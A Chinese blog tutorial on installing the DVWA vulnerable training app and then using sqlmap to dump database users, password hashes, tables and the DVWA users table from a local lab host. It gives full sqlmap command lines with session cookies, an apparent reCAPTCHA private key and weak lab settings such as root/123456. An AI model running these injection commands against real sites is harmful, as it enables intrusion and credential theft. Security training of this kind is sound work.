DVWA+SQLmap+Mysql注入实战

本文涉及的产品
云数据库 RDS MySQL Serverless,0.5-2RCU 50GB
简介:

一、部署渗透测试演练系统DVWA


1. 下载DVWA软件包

    官方下载地址:http://www.dvwa.co.uk/,当前最新版本为:DVWA-1.9

    wget https://codeload.github.com/ethicalhack3r/DVWA/zip/master


2. 部署linux环境

    yum install -y httpd mysql mysql-server php php-mysql php-gd


3. 开启httpd和mysqld服务

    service httpd start

    service mysqld start


4. 测试htttp对php的解析,浏览器访问http://ip/test.php正常

    vim /var/www/html/test.php

    写入:

   <?php

     phpinfo();

   ?>


5. 修改mysql的密码

     mysqladmin -uroot password "123456"


6. 将DVWA-1.9.zip解压至/var/www/html,并修改属主为apache

     unzip DVWA-1.9.zip -d /var/www/html

    chown -R apache:apache /var/www/html/DVWA-1.9


7. 修改DVWA配置文件数据库密码为123456

    vim /var/www/html/DVWA-1.9/config/config.inc.php

    修改密码:

    $_DVWA[ 'db_password' ] = '123456';

 wKiom1ir7Zqx50rWAAAP-62Y_pI155.png


8. 进入DVWA的web安装界面,http://ip/DVWA-1.9/setup.php,发现报错    

 wKioL1ir7XqzRVPOAACIFpWTX4A702.png


   解决方法:

   1)编辑php的配置文件 vim /etc/php.ini

        allow_url_include = On

 wKioL1ir7b-w2fnpAAAN5J3Xzs8076.png


   2)编辑DVWA配置文件 vim /var/www/html/DVWA-1.9/config/config.inc.php

        找到创建公钥和私钥的链接:https://www.google.com/recaptcha/admin/create申请后填写在配置文件中:

       公钥:6LcY-BUUAAAAAGJ5Q0Y5zPEccMG5vCeHI1Lnwqyb

                  私钥:6LcY-BUUAAAAAPvvHmppQRscfHuV0QPPuM5-Px3k

 wKiom1ir7eKBimnKAAAbMpRMHrA320.png


wKiom1ir7g6QSbuPAACTPfN-Vpc641.png

wKioL1ir7imwM_wfAAAjjIuOh70351.png

    


9. 重启http,使修改的配置文件生效,刷新web界面,错误消除

    service httpd restart

 wKioL1ir7k2iQ69HAABWVJhzP2s567.png


10. 点击Create/Reset Database,自动跳转到登录界面,默认用户名/密码:admin/password

      至此,DVWA已部署完成

      wKiom1ir7mPx7mZKAADua26pFAg653.png



二、安装SQLmap漏洞查看工具

 

1. 官方下载:http://sqlmap.org/http://sqlmap.org/

     版本:sqlmapproject-sqlmap-1.0.9-87-g7eab1bc.tar.gz


2.  解压sqlmap,并执行

      说明:该工具是用python写的,需安装python,它不是编译型语言,而是执行性语言,直接运行

     wKioL1ir7pKy6QmJAAAJO0svK9E341.png


      命令 tar -zxvf  sqlmapproject-sqlmap-1.0.9-87-g7eab1bc.tar.gz

      命令 ./sqlmap.py

      wKiom1ir7rHicRpaAAApvyYH0lE089.png


3. 设置命令别名,修改vim /etc/profile,直接使用sqlmap命令

     命令 alias sqlmap='python /usr/local/src/sqlmapproject-sqlmap-7eab1bc/sqlmap.py'

     命令 source /etc/profile  

      wKiom1ir7sWD15LEAAAVcG8dWIw364.png



三、实战

        实战1:枚举登录MYSQL数据的用户名与密码

        实战2:枚举所有数据库

        实战3:枚举指定数据库的数据表

        实战4:获取指定数据库和表中所有列的信息

        实战5:枚举指定数据表中的所有用户名与密码


       环境准备:

       1)登录http://192.168.1.124/DVWA-1.9,将安全级别设置为最低;


       2)开启Firefox浏览器TamperData插件,等待获取cookies值;


       3)在【SQL Injection】项中,提交User ID为22(地址栏出现id=22,这就是MySQL的注入点)

             获得注入点:http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=22&Submit=Submit#


       4)TamperData弹窗获取cookies值:security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552


        

wKioL1ir7vqCmqKpAACBOlEPstQ897.png


wKiom1ir7xaQEBcYAABbjMUXB0w015.png



实战1:枚举登录MYSQL数据的用户名与密码

   sqlmap语法参数:

  • -u :指定目标URL,即注入点

  • --cookies:当前会话的cookies值

  • -b:获取数据库类型,检索数据库管理系统标识

  • --current-db:获取当前数据库

  • --current-user:获取当前登录数据库使用的用户


命令:

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' -b  --current-db  --current-user


说明:根据提示回复Y,继续


wKiom1ir73_DP8MFAABNbA9Svfw188.png


结果:得到当前数据库为dawa,使用的用户为root@localhost


wKioL1ir75iB4QDPAAA4GIZMCIU558.png



实战2:枚举所有数据库

   sqlmap语法参数:

  • --users:枚举数据库用户名

  • -password:枚举数据库用户的密码(hash)

   

命令:

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' --string="Surname" --users --password

wKioL1ir79DQPsHIAAAdqeK4hsY147.png


说明:选择目录下字典文件,暴力破解


wKioL1ir79zz1rl9AAAboWh7XLg480.png


结果:数据库用户名为root,密码也有明文形式123456


wKiom1ir7-igiyGKAAAj8h9xVlw598.png



实战3:枚举数据库和指定数据库的数据表

   sqlmap语法参数:

  • --dbs:枚举当前数据库


命令:

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' --string="Surname" --dbs


结果:mysql下所有的数据库

wKiom1ir8ALiZIK3AAAmjvflPbM786.png


命令:

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' --string="Surname" -D dvwa --tables


结果:dvwa库中,所有的表

wKiom1ir8BXA7lIhAAAjvpwDeGY232.png


实战4:获取指定数据库和表中所有列的信息

   sqlmap语法参数:

  • -D:指定的数据库

  • -T:指定数据库中的数据表

  • --columns:获取列的信息


命令:

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' --string="Surname" -D dvwa -T users --columns


结果:dvwa库,users表中所有字段信息

wKiom1ir8CeR8T6bAAA8TyLn2yA812.png



实战5:枚举指定数据表中的所有用户名与密码

   sqlmap语法参数:

  • -C:枚举数据表中的列

  • --dump:存储数据表项


命令:

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' --string="Surname" -D dvwa -T users -C user,password --dump


结果:dvwa库,users表中user字段和password字段信息,最后表中信息转存文件中

wKioL1ir8ECQtb0YAABIarDX3dw296.png










本文转自 huangzp168 51CTO博客,原文链接:http://blog.51cto.com/huangzp/1899871,如需转载请自行联系原作者
相关实践学习
基于CentOS快速搭建LAMP环境
本教程介绍如何搭建LAMP环境,其中LAMP分别代表Linux、Apache、MySQL和PHP。
全面了解阿里云能为你做什么
阿里云在全球各地部署高效节能的绿色数据中心,利用清洁计算为万物互联的新世界提供源源不断的能源动力,目前开服的区域包括中国(华北、华东、华南、香港)、新加坡、美国(美东、美西)、欧洲、中东、澳大利亚、日本。目前阿里云的产品涵盖弹性计算、数据库、存储与CDN、分析与搜索、云通信、网络、管理与监控、应用服务、互联网中间件、移动服务、视频服务等。通过本课程,来了解阿里云能够为你的业务带来哪些帮助 &nbsp; &nbsp; 相关的阿里云产品:云服务器ECS 云服务器 ECS(Elastic Compute Service)是一种弹性可伸缩的计算服务,助您降低 IT 成本,提升运维效率,使您更专注于核心业务创新。产品详情: https://www.aliyun.com/product/ecs
目录
相关文章
|
29天前
|
SQL 关系型数据库 MySQL
【MySQL技术专题】「问题实战系列」深入探索和分析MySQL数据库的数据备份和恢复实战开发指南(8.0版本升级篇)
【MySQL技术专题】「问题实战系列」深入探索和分析MySQL数据库的数据备份和恢复实战开发指南(8.0版本升级篇)
96 0
|
2天前
|
安全 关系型数据库 MySQL
node实战——后端koa结合jwt连接mysql实现权限登录(node后端就业储备知识)
node实战——后端koa结合jwt连接mysql实现权限登录(node后端就业储备知识)
11 3
|
2天前
|
SQL 关系型数据库 MySQL
不允许你不知道的 MySQL 优化实战(一)
不允许你不知道的 MySQL 优化实战(一)
10 2
|
5天前
|
关系型数据库 MySQL 中间件
【MySQL实战笔记】07 | 行锁功过:怎么减少行锁对性能的影响?-02 死锁和死锁检测
【4月更文挑战第19天】在高并发环境下,死锁发生在多个线程间循环等待资源时,导致无限期等待。MySQL中,死锁可通过`innodb_lock_wait_timeout`参数设置超时或`innodb_deadlock_detect`开启死锁检测来解决。默认的50s超时可能不适用于在线服务,而频繁检测会消耗大量CPU。应对热点行更新引发的性能问题,可以暂时关闭死锁检测(风险是产生大量超时),控制并发度,或通过分散记录减少锁冲突,例如将数据分拆到多行以降低死锁概率。
19 1
|
8天前
|
SQL 关系型数据库 MySQL
Python与MySQL数据库交互:面试实战
【4月更文挑战第16天】本文介绍了Python与MySQL交互的面试重点,包括使用`mysql-connector-python`或`pymysql`连接数据库、执行SQL查询、异常处理、防止SQL注入、事务管理和ORM框架。易错点包括忘记关闭连接、忽视异常处理、硬编码SQL、忽略事务及过度依赖低效查询。通过理解这些问题和提供策略,可提升面试表现。
29 6
|
15天前
|
存储 关系型数据库 MySQL
【MySQL实战笔记】 04 | 深入浅出索引(上)-02
【4月更文挑战第9天】InnoDB数据库使用B+树作为索引模型,其中主键索引的叶子节点存储完整行数据,非主键索引则存储主键值。主键查询只需搜索一棵树,而非主键查询需两次搜索,因此推荐使用主键查询以提高效率。在插入新值时,B+树需要维护有序性,可能导致数据页分裂影响性能。自增主键在插入时可避免数据挪动和页分裂,且占用存储空间小,通常更为理想。然而,如果场景仅需唯一索引,可直接设为主键以减少查询步骤。
16 1
【MySQL实战笔记】 04 | 深入浅出索引(上)-02
|
17天前
|
存储 SQL 关系型数据库
【MySQL实战笔记】03.事务隔离:为什么你改了我还看不见?-02
【4月更文挑战第7天】数据库通过视图实现事务隔离,不同隔离级别如读未提交、读已提交、可重复读和串行化采用不同策略。以可重复读为例,MySQL使用多版本并发控制(MVCC),每个事务有其独立的视图。回滚日志在无更早视图时被删除。长事务可能导致大量存储占用,应避免。事务启动可显式用`begin`或设置`autocommit=0`,但后者可能意外开启长事务。建议使用`autocommit=1`并显式管理事务,若需减少交互,可使用`commit work and chain`。
30 5
|
19天前
|
SQL 存储 关系型数据库
【MySQL实战笔记】02.一条SQL更新语句是如何执行的-2
【4月更文挑战第5天】两阶段提交是为确保`redo log`和`binlog`逻辑一致,避免数据不一致。若先写`redo log`, crash后数据可能丢失,导致恢复后状态错误;若先写`binlog`,crash则可能导致重复事务,影响数据库一致性。一天一备相较于一周一备,能缩短“最长恢复时间”,但需权衡额外的存储成本。
16 1
|
29天前
|
SQL 关系型数据库 MySQL
【MySQL技术专题】「问题实战系列」深入探索和分析MySQL数据库的数据备份和恢复实战开发指南(数据恢复补充篇)(一)
【MySQL技术专题】「问题实战系列」深入探索和分析MySQL数据库的数据备份和恢复实战开发指南(数据恢复补充篇)
30 0
|
1月前
|
存储 Kubernetes 关系型数据库
KubeSphere 核心实战之一【在kubesphere平台上部署mysql】(实操篇 1/4)
KubeSphere 核心实战之一【在kubesphere平台上部署mysql】(实操篇 1/4)
49 0